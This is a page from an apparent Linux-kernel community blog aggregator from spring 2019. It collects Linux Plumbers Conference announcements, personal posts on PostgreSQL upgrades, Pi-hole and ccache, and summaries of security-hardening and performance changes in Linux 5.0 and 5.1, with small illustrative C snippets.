– Network Authentication
– Encryption
– Firmware updates
– And more

Come join us and participate in the discussion on what keeps the Internet of Things together.

We hope to see you there!

June 12, 2019 02:00 PM

June 07, 2019

Pete Zaitcev: PostgreSQL and upgrades

As mentioned previously, I run a personal Fediverse instance with Pleroma, which uses Postgres. On Fedora, of course. So, a week ago, I went to do the usual "dnf distro-sync --releasever=30". And then, Postgres fails to start, because the database uses the previous format, 10, and the packages in F30 require format 11. Apparently, I was supposed to dump the database with pg_dumpall, upgrade, then restore. But now that I have binaries that refuse to read the old format, dumping is impossible. Wow.

A little web searching found an upgrader that works across formats (dnf install postgresql-upgrade; postgresql-setup --upgrade). But that one also copies the database, like a dump-restore procedure would. What if the database is too large for this? Am I the only one who finds these practices unacceptable?

Postgres was supposed to be a solid big brother to a boisterous but unreliable upstart MySQL, kind of like Postfix and Exim. But this is just such an absurd fault, it makes me think that I'm missing something essential.

UPDATE: Kaz commented that a form of -compat is conventional:

When I've upgraded in the past, Ubuntu has always just installed the new version of postgres alongside the old one, to allow me to manually export and reimport at my leisure, then remove the old version afterward. Because both are installed, you could pipe the output of one dumpall to the psql command on the other database and the size doesn't matter. The apps continue to point at their old version until I redirect them.

Yeah, as much as I can tell, Fedora does not package anything like that.

June 07, 2019 02:04 PM

June 04, 2019

Linux Plumbers Conference: Containers and Checkpoint/Restore MC Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Containers and Checkpoint/Restore Microconference has been accepted into the 2019 Linux Plumbers Conference! Even after the success of last year’s Containers Microconference, there’s still more to work on this year.

Last year had a security focus that featured seccomp support and LSM namespacing and stacking; now the next steps, and the sets of blockers for them, need to be discussed.

Since last year’s Linux Plumbers in Vancouver, binderfs has been accepted into mainline, but more work is needed in order to fully support Android containers.

Another improvement since Vancouver is that shiftfs is now functional and included in Ubuntu; however, more work is required (including changes to VFS) before shiftfs can be accepted into mainline.

CGroup V2 is an ongoing task needing more work, with one topic of particular interest being feature parity with V1.

Additional important discussion topics include:

Come join us and participate in the discussion on what holds “The Cloud” together.

June 04, 2019 02:05 PM

June 03, 2019

Pete Zaitcev: Pi-hole

With the recent move by Google to disable ad-blockers in Chrome (except for Enterprise level customers[1]), interest is sure to increase in methods of protection against ad-delivered malware other than browser plug-ins. I'm sure Barracuda will make some coin if it's still around. And on the free software side, someone is making an all-in-one package for Raspberry Pi, called "Pi-hole". It works by screwing with DNS, which is actually an impressive demonstration of what an attack on DNS can do.

An obvious problem with Pi-hole is what happens to laptops when they are outside of the home site protection. I suppose one could devise a clone of Pi-hole that plugs into dnsmasq. Every Fedora system runs one, because NM needs it in order to support the correct lookup on VPNs {Update: see below}. The most valuable part of Pi-hole is the blocklist; the rest is just scripting.

[1] "Google’s Enterprise ad-blocking exception doesn’t seem to include G Suite’s low and mid-tier subscribers. G Suite Basic is $6 per user per month and G Suite Business is $12 per user month."

UPDATE: Ouch. A link by Roy Schestowitz made me remember how it actually worked, and I was wrong above: NM does not run dnsmasq by default. It only has the capability to do so, if you want DNS lookups on VPNs to work correctly. So, every user of VPNs enables "dns=dnsmasq" in NM. But it is not the default.

UPDATE: A reader mentions that he was rooted by ads served by Space.com. Only 1 degree of separation (beyond Windows in my family).

June 03, 2019 02:37 PM

May 28, 2019

Kees Cook: security things in Linux v5.1

Previously: v5.0.

Linux kernel v5.1 has been released! Here are some security-related things that stood out to me:

introduction of pidfd
Christian Brauner landed the first portion of his work to remove pid races from the kernel: using a file descriptor to reference a process (“pidfd”). Now /proc/$pid can be opened and used as an argument for sending signals with the new pidfd_send_signal() syscall. This handle will only refer to the original process at the time the open() happened, and not to any later “reused” pid if the process dies and a new process is assigned the same pid. Using this method, it’s now possible to racelessly send signals to exactly the intended process without having to worry about pid reuse. (BTW, this commit wins the 2019 award for Most Well Documented Commit Log Justification.)
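
As a rough userspace sketch (the pid is illustrative, and __NR_pidfd_send_signal may need to be defined by hand if your libc headers predate v5.1):

#define _GNU_SOURCE
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(void)
{
	/* In v5.1 the pidfd is just an open /proc/$pid directory fd. */
	int pidfd = open("/proc/1234", O_DIRECTORY | O_CLOEXEC);

	if (pidfd < 0) {
		perror("open");
		return 1;
	}
	/* Signals the process this fd refers to, even if pid 1234 has
	 * since exited and been recycled for an unrelated process. */
	if (syscall(__NR_pidfd_send_signal, pidfd, SIGTERM, NULL, 0) < 0) {
		perror("pidfd_send_signal");
		return 1;
	}
	return 0;
}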

explicitly test for userspace mappings of heap memory
During the Linux Conf AU 2019 Kernel Hardening BoF, Matthew Wilcox noted that there wasn’t anything in the kernel actually sanity-checking when userspace mappings were being applied to kernel heap memory (which would allow attackers to bypass the copy_{to,from}_user() infrastructure). Driver bugs or attackers able to confuse mappings wouldn’t get caught, so he added checks. To quote the commit logs: “It’s never appropriate to map a page allocated by SLAB into userspace” and “Pages which use page_type must never be mapped to userspace as it would destroy their page type”. The latter check almost immediately caught a bad case, which was quickly fixed to avoid page type corruption.

LSM stacking: shared security blobs
Casey Schaufler has landed one of the major pieces of getting multiple Linux Security Modules (LSMs) running at the same time (called “stacking”). It is now possible for LSMs to share the security-specific storage “blobs” associated with various core structures (e.g. inodes, tasks, etc) that LSMs can use for saving their state (e.g. storing which profile a given task is confined under). The kernel originally gave only the single active “major” LSM (e.g. SELinux, AppArmor, etc) full control over the entire blob of storage. With “shared” security blobs, the LSM infrastructure does the allocation and management of the memory, and LSMs use an offset for reading/writing their portion of it. This clears the way for “medium sized” LSMs (like SARA and Landlock) to be stacked with a “major” LSM, as they need to store much more state than the “minor” LSMs (e.g. Yama, LoadPin) which could already stack because they didn’t need blob storage.
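
A minimal sketch of the pattern, using a hypothetical “example” LSM (struct lsm_blob_sizes is the real infrastructure; everything named “example” is made up):

#include <linux/lsm_hooks.h>
#include <linux/sched.h>
#include <linux/types.h>

struct example_task_ctx {
	u32 confined_profile;	/* hypothetical per-task state */
};

/* Declare how much task-blob space this LSM needs; the infrastructure
 * sums all LSMs' requests and fills in each LSM's offsets at boot. */
static struct lsm_blob_sizes example_blob_sizes __lsm_ro_after_init = {
	.lbs_task = sizeof(struct example_task_ctx),
};

/* Accessor: read/write only this LSM's slice of the shared blob. */
static inline struct example_task_ctx *example_task(struct task_struct *task)
{
	return task->security + example_blob_sizes.lbs_task;
}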

SafeSetID LSM
Micah Morton added the new SafeSetID LSM, which provides a way to narrow the power associated with the CAP_SETUID capability. Normally a process with CAP_SETUID can become any user on the system, including root, which makes it a meaningless capability to hand out to non-root users in order for them to “drop privileges” to some less powerful user. There are trees of processes under Chrome OS that need to operate under different user IDs and other methods of accomplishing these transitions safely weren’t sufficient. Instead, this provides a way to create a system-wide policy for user ID transitions via setuid() (and group transitions via setgid()) when a process has the CAP_SETUID capability, making it a much more useful capability to hand out to non-root processes that need to make uid or gid transitions.

ongoing: refcount_t conversions
Elena Reshetova continued landing more refcount_t conversions in core kernel code (e.g. scheduler, futex, perf), with an additional conversion in btrfs from Anand Jain. The existing conversions, mainly when combined with syzkaller, continue to show their utility at finding bugs all over the kernel.
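
For context, a small hypothetical sketch of what a conversion target looks like once switched from atomic_t to refcount_t:

#include <linux/refcount.h>
#include <linux/slab.h>

struct example_obj {
	refcount_t refs;	/* was atomic_t before the conversion */
};

static void example_get(struct example_obj *obj)
{
	refcount_inc(&obj->refs);	/* saturates and WARNs on overflow */
}

static void example_put(struct example_obj *obj)
{
	/* underflow would also WARN instead of silently wrapping */
	if (refcount_dec_and_test(&obj->refs))
		kfree(obj);
}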

ongoing: implicit fall-through removal
Gustavo A. R. Silva continued to make progress on marking more implicit fall-through cases. What’s so impressive to me about this work, like refcount_t, is how many bugs it has been finding (see all the “missing break” patches). It really shows how quickly the kernel benefits from adding -Wimplicit-fallthrough to keep this class of bug from ever returning.

stack variable initialization includes scalars
The structleak gcc plugin (originally ported from PaX) had its “by reference” coverage improved to initialize scalar types as well (making “structleak” a bit of a misnomer: it now stops leaks from more than structs). Barring compiler bugs, this means that all stack variables in the kernel can be initialized before use at function entry. For variables not passed to functions by reference, the -Wuninitialized compiler flag (enabled via -Wall) already makes sure the kernel isn’t building with local-only uninitialized stack variables. And now with CONFIG_GCC_PLUGIN_STRUCTLEAK_BYREF_ALL enabled, all variables passed by reference will be initialized as well. This should eliminate most, if not all, uninitialized stack flaws with very minimal performance cost (for most workloads it is lost in the noise), though it does not have the stack data lifetime reduction benefits of GCC_PLUGIN_STACKLEAK, which wipes the stack at syscall exit. Clang has recently gained similar automatic stack initialization support, and I’d love to see this feature in native gcc. To evaluate the coverage of the various stack auto-initialization features, I also wrote regression tests in lib/test_stackinit.c.
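
A hypothetical sketch of the “by reference” case that the plugin covers and -Wuninitialized cannot:

#include <linux/uaccess.h>

struct example_info {
	int status;
	char name[16];
};

static void example_fill_partial(struct example_info *info)
{
	info->status = 0;	/* note: name[] left untouched */
}

static long example_query(void __user *arg)
{
	struct example_info info;	/* plugin initializes this at entry */

	/* Passing &info by reference silences -Wuninitialized, even
	 * though only part of the struct ever gets written. */
	example_fill_partial(&info);

	/* Without the plugin, the untouched bytes would leak stack
	 * contents to userspace here. */
	return copy_to_user(arg, &info, sizeof(info)) ? -EFAULT : 0;
}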

That’s it for now; please let me know if I missed anything. The v5.2 kernel development cycle is off and running already. :)

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

May 28, 2019 03:49 AM

May 27, 2019

Linux Plumbers Conference: Distribution Kernels Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Distribution Kernels Microconference has been accepted to the 2019 Linux Plumbers Conference. This is the first time Plumbers has offered a microconference focused on kernel distribution collaboration.

Linux distributions come in many forms, ranging from community-run distributions like Debian and Gentoo, to commercially supported ones offered by SUSE or Red Hat, to focused embedded distributions like Android or Yocto. Each of these distributions maintains a kernel, making choices related to features and stability. The focus of this track is on the pain points distributions face in maintaining their chosen kernel and on common solutions every distribution can benefit from.

Example topics include:

“Distribution kernel” is used in a very broad manner. If you maintain a kernel tree for use by others, we welcome you to come and share your experiences.

Here is a list of proposed topics. For Linux Plumbers 2019, new topics for microconferences can be submitted via the Call for Proposals (CfP) interface. Please visit the CfP page for more information.

May 27, 2019 05:24 PM

May 26, 2019

Linux Plumbers Conference: Linux Plumbers Earlybird Registration Quota Reached, Regular Registration Opens 30 June

A few days ago we added more capacity to the earlybird registration quota, but that too has now filled up, so your next opportunity to register for Plumbers will be Regular Registration on 30 June. Alternatively, the call for presentations for the refereed track is still open, and accepted talks will get a free pass.

Quotas were added a few years ago to avoid the entire conference selling out months ahead of time, and to accommodate attendees whose approval process takes a while or whose company simply won’t allow them to register until closer to the date of the conference.

May 26, 2019 04:54 PM

May 22, 2019

Linux Plumbers Conference: Additional early bird slots available for LPC 2019

The Linux Plumbers Conference (LPC) registration web site has been showing “sold out” recently because the cap on early bird registrations was reached. We are happy to report that we have reviewed the registration numbers for this year’s conference and were able to open more early bird registration slots. Beyond that, regular registration will open July 1st. Please note that speakers and microconference runners get free passes to LPC, as do some microconference presenters, so that may be another way to attend the conference. Time is running out for new refereed-track and microconference proposals, so visit the CFP page soon. Topics for accepted microconferences are welcome as well.

LPC will be held in Lisbon, Portugal from Monday, September 9 through Wednesday, September 11.

We hope to see you there!

May 22, 2019 01:03 PM

May 20, 2019

James Morris: Linux Security Summit 2019 North America: CFP / OSS Early Bird Registration

The LSS North America 2019 CFP is currently open, and you have until May 31st to submit your proposal. (That’s the end of next week!)

If you’re planning on attending LSS NA in San Diego, note that the Early Bird registration for Open Source Summit (which we’re co-located with) ends today.

You can of course just register for LSS on its own, here.

May 20, 2019 08:56 PM

Linux Plumbers Conference: Tracing Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Tracing Microconference has been accepted into the 2019 Linux Plumbers Conference! Its return to Linux Plumbers shows that tracing is not finished in Linux, and there continue to be challenging problems to solve.

There’s a broad range of ways to perform tracing in Linux: from the original mainline Linux tracer, Ftrace, to profiling tools like perf, more complex customized tracing like BPF, and out-of-tree tracers like LTTng, SystemTap, and DTrace. Part of the trouble with tracing within Linux is that there is so much to choose from. Each of these has its own audience, but there is a lot of overlap. This year’s theme is to find those common areas and combine them into common utilities.

There is also a lot of new work that is happening and discussions between top maintainers will help keep everyone in sync, and provide good direction for the future.

Expected topics include:

Come and join us and not only learn but help direct the future progress of tracing inside the Linux kernel and beyond!

Here is a list of proposed tracing topics. For Linux Plumbers 2019, new topics for microconferences can be submitted via the Call for Proposals (CfP) interface. Please visit the CfP page for more information.

We hope to see you there!

May 20, 2019 05:37 PM

Pete Zaitcev: Google Fi

Seen an amusing blog post today on the topic of the hideous debacle that is Google Fi (on top of being a virtual network). Here's the best part though:

About a year ago I tried to get my parents to switch from AT&T to Google Fi. I even made a spreadsheet for my dad (who likes those sorts of things) about how much money he could save. He wasn’t interested. His one point was that at anytime he can go in and get help from an AT&T rep. I kept asking “Who cares? Why would you ever need that?”. Now I know. He was paying almost $60 a month premium for the opportunity to be able to talk to a real person, face-to-face! I would gladly pay that now.

Respect your elders!

May 20, 2019 03:39 PM

Ted Tso: Switching to Hugo

With the demise of Google+, I’ve decided to try to resurrect my blog. Previously, I was using WordPress, but I’ve decided that it’s just too risky from a security perspective. So I’ve moved my blog over to Hugo.

A consequence of this switch is that all of the WordPress comments have been dropped, at least for now.

May 20, 2019 03:19 AM

May 14, 2019

Dave Airlie (blogspot): Senior Job in Red Hat graphics team

We have a job in our team; it's a pretty senior role, so we definitely want people with lots of experience. Great place to work, ignore any possible future mergers :-)

https://global-redhat.icims.com/jobs/68911/principal-software-engineer/job?mobile=false&width=1526&height=500&bga=true&needsRedirect=false&jan1offset=600&jun1offset=600

May 14, 2019 09:07 PM

May 10, 2019

Linux Plumbers Conference: RISC-V microconference accepted for the 2019 Linux Plumbers Conference

The open nature of the RISC-V ecosystem has allowed contributions from both academia and industry, leading to an unprecedented number of new hardware design proposals in a very short time span. Linux support is the key to enabling these new hardware options. Since last year’s Plumbers, many kernel features were added to RISC-V. To name a few, we now have out-of-the-box 32-bit and eBPF support, some key issues with the Linux boot process have been addressed, and hypervisor support is on its way.

Last year’s RISC-V microconference was such a success that we would like to repeat that again this year by focusing on finding solutions and discussing ideas that require kernel changes.

Topics for this year’s microconference are expected to cover:

If you’re interested in participating in this microconference, please contact Atish Patra (atish.patra@wdc.com) or Palmer Dabbelt (palmer@dabbelt.com). For Linux Plumbers 2019, new topics for microconferences can be submitted via the Call for Proposals (CfP) interface. Please visit the CfP page for more information.

LPC will be held in Lisbon, Portugal from Monday, September 9 through Wednesday, September 11.

We hope to see you there!

May 10, 2019 07:55 PM

May 09, 2019

Davidlohr Bueso: Linux v5.1: Performance Goodies

sched/wake_q: reduce atomic operations for special users

Some core users of wake_qs, futex and rwsems, were incurring double task reference counting, a side effect kept for safety reasons. This change brings the call's performance in line with the rest of the users.
[Commit 07879c6a3740]
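
As a rough sketch of the idea (wake_q_add_safe() is the helper name from the commit above; treat the snippet as illustrative rather than the literal patch):

/* wake_q_add() takes its own reference on the task, so callers that
 * already hold one, such as futex and rwsem, paid for a second atomic
 * get/put pair. The _safe variant hands the caller's reference off. */
DEFINE_WAKE_Q(wake_q);

get_task_struct(p);            /* reference the caller already needs */
wake_q_add_safe(&wake_q, p);   /* consumes it: no extra refcount bump */
wake_up_q(&wake_q);            /* wakes p and drops the reference */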

irq: Speedup for interrupt statistics in /proc/stat

On large systems with a large number of interrupts, the readout of /proc/stat takes a long time to sum up the interrupt statistics, because the statistics are accounted per CPU and the /proc/stat logic has to sum them for each interrupt. While applications shouldn't really be doing this to the point where it creates bottlenecks, the fix was fairly easy.
[Commit 1136b0728969]
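
To see why the readout is expensive, here is a simplified sketch (not the literal kernel code) of what summing one interrupt's statistics looks like; /proc/stat had to redo this walk for every interrupt on every read:

/* Sum a per-CPU interrupt counter across all possible CPUs. */
static unsigned int irq_stat_sum(struct irq_desc *desc)
{
	unsigned int sum = 0;
	int cpu;

	for_each_possible_cpu(cpu)
		sum += *per_cpu_ptr(desc->kstat_irqs, cpu);
	return sum;
}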

mm/swapoff: replace quadratic complexity with linear

try_to_unuse() is of quadratic complexity, with a lot of wasted effort. It unuses swap entries one by one, potentially iterating over all the page tables for all the processes in the system for each one. With these changes, it now iterates over the system's mms once, unusing all the affected entries as it walks each set of page tables.

Benchmarks show the time for swapoff on a swap partition containing about 6G of data dropping from 8 minutes to 3.
[Commit c5bf121e4350 b56a2d8af914]

mm: make pinned_vm an atomic counter

This reduces some of the bulky mmap_sem games that are played when callers (mostly RDMA) deal with the pinned pages counter, and avoids relying on the lock for get_user_pages operations.
[Commit 70f8a3ca68d3 3a2a1e90564e b95df5e3e459]
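
A before/after sketch of the shape of the change (assumed shapes, not the literal diff):

/* before: bumping the pinned-pages counter needed the mmap_sem */
down_write(&mm->mmap_sem);
mm->pinned_vm += npages;
up_write(&mm->mmap_sem);

/* after: pinned_vm is an atomic64_t, so no writer lock is required */
atomic64_add(npages, &mm->pinned_vm);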

drivers/async: NUMA aware async_schedule calls

Asynchronous function calls reduce, primarily, kernel boot time by safely doing out-of-order operations, such as device discovery. This series improves NUMA locality by being able to schedule device-specific init work on specific NUMA nodes in order to improve the performance of memory initialization. Significant reductions in init times for persistent memory were seen.
[Commit 3451a495ef24 ed88747c6c4a ef0ff68351be 8204e0c1113d 6be9238e5cb6 c37e20eaf4b2 8b9ec6b73277 af87b9a7863c 57ea974fb871]

lib/iov_iter: optimize page_copy_sane()

This avoids cacheline misses when dereferencing a struct page, via compound_head(), when possible. Apparently the overhead was visible on TCP doing recvmsg() calls dealing with GRO packets.
[Commit 6daef95b8c91]

fs/epoll: reduce lock contention in ep_poll_callback()

This patch increases the bandwidth of events which can be delivered from sources to the poller by adding poll items to the ready list in a lockless way, via clever use of xchg() while holding a reader rwlock. This improves scenarios with multiple threads generating IO events which are delivered to a single-threaded epoll_wait()er.
[Commit c141175d011f c3e320b61581 a218cc491420]

fs/nfs: reduce cost of listing huge directories (readdirplus)

When listing very large directories via NFS, clients may take a long time to complete. Much of the cost comes from libc's readdir(3) reading 32k of entries at a time. To improve performance and reduce the number of RPC calls, the NFS readdirplus RPC now asks for more data (more than 32k); the data can fill more than one page, and the cached pages can be used for the next readdir call. Benchmarks show RPC calls decreasing by 85% while listing a directory with 300k files.
[Commit be4c2d4723a4]

fs/pnfs: Avoid read/modify/write when it is not necessary

When testing with fio, throughput of overwrites (both buffered and O_SYNC) is noticeably improved.
[Commit 97ae91bbf3a7 2cde04e90d5b]

May 09, 2019 08:10 PM

Davidlohr Bueso: Linux v5.0: Performance Goodies

mm/page-alloc: reduce zone->lock contention

Contention on the zone->lock in the page allocator was seen in a network traffic report, in which order-0 pages were being freed directly back to the buddy allocator instead of making use of the per-cpu pages in the page_frag_free() call. Aside from eliminating the contention, the change was seen to improve some microbenchmarks.
[Commit 65895b67ad27]

mm/mremap: improve scalability on large regions

When THP is disabled, move_page_tables() can bottleneck a large mremap() call, as it will copy one pte at a time. This patch speeds things up by copying at the PMD level when possible. Up to 20x speedups were seen when remapping 1GB.
[Commit 2c91bd4a4e2e]
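
Conceptually, the fast path looks something like this (a sketch; the real helper added by the commit is move_normal_pmd(), whose argument list is abbreviated here):

/* When a full PMD-sized extent is being moved and both addresses are
 * PMD-aligned, re-plant the whole page-table page at the destination
 * instead of copying its 512 ptes one at a time. */
if (extent == PMD_SIZE &&
    IS_ALIGNED(old_addr, PMD_SIZE) && IS_ALIGNED(new_addr, PMD_SIZE))
	moved = move_normal_pmd(vma, old_addr, new_addr, ...);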

mm: improve anti-fragmentation

Given sufficient time or an adverse workload, memory gets fragmented and the long-term success of high-order allocations degrades. Overall the series reduces external fragmentation causing events by over 94% on 1 and 2 socket machines, which in turn impacts high-order allocation success rates over the long term.
[Commit 6bb154504f8b a921444382b4 0a79cdad5eb2 1c30844d2dfe]

mm/hotplug: optimize clear_hwpoisoned_pages()

During hotplug remove, the kernel will loop over the respective number of pages looking for poisoned pages. Checking the atomic count of poisoned pages first, in case there are none, optimizes the function.
[Commit 5eb570a8d924]

mm/ksm: Replace jhash2 with xxhash

xxhash is an extremely fast non-cryptographic hash algorithm for checksumming, making it suitable to use in kernel samepage merging. On a custom KSM benchmark, throughput was seen to improve from 1569 to 8770 MB/s.

genirq/affinity: Spread IRQs to all available NUMA nodes

If the number of NUMA nodes exceeds the number of MSI/MSI-X interrupts which are allocated for a device, the interrupt affinity spreading code fails to spread them across all nodes. NUMA nodes above the number of interrupts are all assigned to hardware queue 0 and therefore NUMA node 0, which results in bad performance and has CPU hotplug implications. Fix this by assigning via round-robin.
[Commit b82592199032]

fs/epoll: Optimizations for epoll_wait()

Various performance changes oriented towards improving the waiting side, such that contention on the epoll waitqueue spinlock (previously ep->lock) is reduced. This produces pretty good results for various concurrent epoll_wait(2) benchmarks.
[Commit 74bdc129850c 4e0982a00564 76699a67f304 21877e1a5b52 c5a282e9635e abc610e01c66 86c051793b4c]

lib/sbitmap: Various optimizations

Two optimizations to the sbitmap core were introduced; it is used, for example, by the blk-mq tags. The first optimizes wakeup checks and adds to the core API, while the second introduces batched clearing of bits, trading 64 atomic bitops for 2 cmpxchg calls.
[Commit 5d2ee7122c73 ea86ea2cdced]

fs/locks: Avoid thundering herd wakeups

When one thread releases a lock on a given file, it wakes up all other threads that are waiting (classic thundering herd): one will get the lock and the others go back to sleep. The overhead becomes noticeable with increasing thread counts. These changes create a tree of pending lock requests in which siblings don't conflict and each lock request does conflict with its parent. When a lock is released, only requests which don't conflict with each other are woken.

Testing shows that lock acquisitions per second are now fairly stable even as the number of contending processes grows to 1000. Without this patch, locks per second drop off steeply after a few tens of processes. Micro-benchmarks can be found in the lockscale program, which tests fcntl(..., F_OFD_SETLKW, ...) and flock(..., LOCK_EX) calls.

arm64/lib: improve crc32 performance for deep pipelines

This change replaces most branches with a branchless code path that overlaps 16-byte loads to process the first (length % 32) bytes, and processes the remainder using a loop that handles 32 bytes at a time.
[Commit efdb25efc764]

May 09, 2019 08:10 PM

Michael Kerrisk (manpages): man-pages-5.01 is released

I've released man-pages-5.01. The release tarball is available on kernel.org. The browsable online pages can be found on man7.org. The Git repository for man-pages is available on kernel.org.

This release resulted from patches, bug reports, reviews, and comments from just over 20 contributors. The release is smaller than typical; it includes just over 70 commits that changed just over 40 pages.

The most notable of the changes in man-pages-5.01 is the following:


May 09, 2019 12:10 PM

May 04, 2019

Pete Zaitcev: YAML

Seen in a blog entry by Martin Tournoij (via):

I’ve been happily programming Python for over a decade, so I’m used to significant whitespace, but sometimes I’m still struggling with YAML. In Python the drawbacks and loss of clarity are contained by not having functions that are several pages long, but data or configuration files have no such natural limits to their length.

[...]

YAML may seem ‘simple’ and ‘obvious’ when glancing at a basic example, but turns out it’s not. The YAML spec is 23,449 words; for comparison, TOML is 3,339 words, JSON is 1,969 words, and XML is 20,603 words.

There's more where the above came from. In particular, the portability issues are rather surprising.

Unfortunately for me, OpenStack TripleO is based on YAML.

May 04, 2019 06:48 PM

Linux Plumbers Conference: BPF microconference accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the BPF microconference has been accepted into the 2019 Linux Plumbers Conference! Last year’s BPF microconference was such a success that it will be held again this year.

BPF along with its just-in-time (JIT) compiler inside the Linux kernel allows for versatile programmability of the kernel and plays a major role in networking (XDP, tc BPF, etc.), tracing (kprobes, uprobes, tracepoints) and security (seccomp, landlock) subsystems.

Since last year’s Plumbers Conference, many of the discussed improvements have been tackled and found their way into the Linux kernel, such as significant steps towards allowing for a compile-once paradigm with the help of BTF and global data support, as well as considerable verifier scalability improvements, to name a few. The topics proposed for this year’s event include:

– libbpf, loader unification
– Standardized BPF ELF format
– Multi-object semantics and linker-style logic for BPF loaders
– Verifier scalability work towards 1 million instructions
– Sleepable BPF programs
– BPF loop support
– Indirect calls in BPF
– Unprivileged BPF
– BPF type format (BTF)
– BPF timers
– bpftool
– LLVM BPF backend, JITs and BPF offloading
– and more

Come join us and participate in the decision making of one of the most cutting edge advancements in the Linux kernel!

See here for a detailed preview of the proposed and accepted topics. For Linux Plumbers 2019, new topics for microconferences can be submitted via the Call for Proposals (CfP) interface. Please visit the CfP page for more information.

We hope to see you there!

May 04, 2019 01:31 AM

May 02, 2019

Pete Zaitcev: Fraud in the material world

Wow, they better not be building Boeings from this crap:

NASA Launch Services Program (LSP) investigators have determined the technical root cause for the Taurus XL launch failures of NASA’s Orbiting Carbon Observatory (OCO) and Glory missions in 2009 and 2011, respectively: faulty materials provided by aluminum manufacturer, Sapa Profiles (SPI). LSP’s technical investigation led to the involvement of NASA’s Office of the Inspector General and the U.S. Department of Justice (DOJ). DOJ’s efforts, recently made public, resulted in the resolution of criminal charges and alleged civil claims against SPI, and its agreement to pay $46 million to the U.S. government and other commercial customers. This relates to a 19-year scheme that included falsifying thousands of certifications for aluminum extrusions to hundreds of customers.

BTW, those costly failures probably hastened the sale of Orbital to ATK in 2015. There were repercussions for the personnel running the Taurus program as well.

May 02, 2019 05:52 PM

Daniel Vetter: Upstream First

lwn.net just featured an article on the sustainability of open source, which seems to have been a bit of a topic in various places for a while. I gave a keynote at the Siemens Linux Community Event 2018 last year which lends itself to a different take on all this:

The slides for those who don’t like videos.

This talk was mostly aimed at managers of engineering teams and projects with fairly little experience in shipping open source, and much less experience in shipping open source through upstream cross-vendor projects like the kernel. It goes through all the usual failings and missteps and explains why an upstream first strategy is the right one, but with a twist: instead of technical reasons, it’s all based on economic considerations of why open source is succeeding. Fundamentally it’s not about the better software, or the cheaper price, or that the software freedoms are a good thing worth supporting.

Instead, open source is eating the world because it enables a much more competitive software market, and all the best practices around open development exist to enable that highly competitive market. Instead of arguing that open source has open development and strongly favours public discussions because that results in better collaboration and better software, we put on the economic lens, and private discussions become insider trading and collusion. And that’s just not considered cool in a competitive market. Similar arguments can be made with everything else going on in open source projects.

Circling back to the list of articles at the top, I think it’s worth looking at the sustainability of open source as an economic issue of an extremely competitive market, in other words, as a market failure: occasionally the result is that no one gets paid, and the customers only receive a sub-par product with all costs externalized - costs like keeping up with security issues. And like with other market failures, a solution needs to be externally imposed through regulations, taxation and transfers to internalize all the costs again into the product’s price. Frankly, I have no idea what that would look like in practice though.

Anyway, just a thought, but good enough a reason to finally publish the recording and slides of my talk, which covers this just in passing in an offhand remark.

Update: Fix slides link.

May 02, 2019 12:00 AM

April 24, 2019

Linux Plumbers Conference: Lots of microconferences proposed for LPC

Microconference proposals have been rolling in for the 2019 Linux Plumbers Conference, but it is not too late to submit more. So far, we have the following microconference proposals:

If you have suggestions for topics to be discussed in those microconferences, please email contact@linuxplumbersconf.org to connect with the microconference runners.

Other microconference topic areas are still welcome, please go to the CFP page to submit yours today!

April 24, 2019 01:36 PM

April 13, 2019

Linux Plumbers Conference: Registration is open for the 2019 Linux Plumbers Conference

Registration is now open for the 2019 edition of the Linux Plumbers Conference (LPC). It will be held September 9-11 in Lisbon, Portugal with dedicated Linux Kernel Summit and Networking tracks, as was done last year, along with the microconferences and refereed presentations that are LPC standards. Go to the registration site to sign up or the attend page for more information on dates and quotas for the various registration types. Early registration will run until June 30 or until the quota is filled.

Note that the CFPs for microconferences, refereed track talks, and BoFs are still open, please see this page for more information.

As always, please contact the organizing committee if you have questions.

April 13, 2019 09:23 AM

April 12, 2019

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Bird of a Feather (BoF) Session Proposals

On the heels of the previous announcements, we are also pleased to announce the Bird of a Feather (BoF) Session Proposals for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

BoFs are free-form get-togethers for people wishing to discuss a particular topic. As always, you only need to submit proposals for BoFs you want to hold on-site. In contrast, and again as always, informal BoFs may be held at local drinking establishments or in the “hallway track” at your convenience.

For more information on submitting a BoF session proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as in 2018. If you created a user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

The calls for Microconferences and Refereed-Track proposals are also open, and we hope to see you in Lisbon this coming September!

April 12, 2019 08:05 AM

April 10, 2019

Paul E. Mc Kenney: Confessions of a Recovering Proprietary Programmer, Part XVI

I build quite a few Linux kernels, mostly in support of my deep and abiding rcutorture habit. These builds can take some time, even on modern laptops, but they are nevertheless amazingly fast compared to the build times of the much smaller projects I worked on in decades past. Additionally, build times are way down in the noise when I am doing multi-hour rcutorture runs. So much so that I don't bother with cut-down kernel configurations, especially given that cut-down configurations are an excellent way to fail to spot subtle RCU API problems.

Still, faster builds do have their advantages, especially when doing a series of short tests, such as when chasing down that rarest of creatures, an RCU bug that reproduces reliably within a few minutes of boot. Which is exactly what I was doing yesterday. And during that time, a five-minute kernel build time was much more annoying than it normally would be.

But that is why we have ccache, a tool that is considerably more attractive than it was back when my laptop's mass storage weighed in at “only” a few tens of gigabytes. With a bit of help from here, here, and the ccache man page, I got ccache up and running, and somewhat later got it actually making kernel builds go faster. Sometimes considerably more than an order of magnitude faster!
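
For anyone wanting to reproduce this, the basic recipe (assuming GCC builds; see the ccache man page for the rest) is along the lines of:

make CC="ccache gcc"

with the cache size raised via something like ccache -M 50G, and ccache -s showing the hit rate as the cache warms up.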

But I do get spoiled really quickly.

You see, the first ccache build goes no faster than a normal build because the cache is initially empty. And yes, a five, six, or even seven-minute build was just fine a couple of days ago: After all, there is always some small task that needs to be done. But having just witnessed builds completing in way less than one minute, even a five-minute wait now seemed horribly slow. And a five-minute build is what I get the first time I run a given rcutorture scenario. Or after I modify an rcutorture scenario. Or if I specify unusual arguments to rcutorture's --kconfig command-line option. Or if I modify a heavily used include file. Or when I configured ccache's cache size too small.

Nevertheless, I most definitely should have installed ccache a very long time ago! :-)

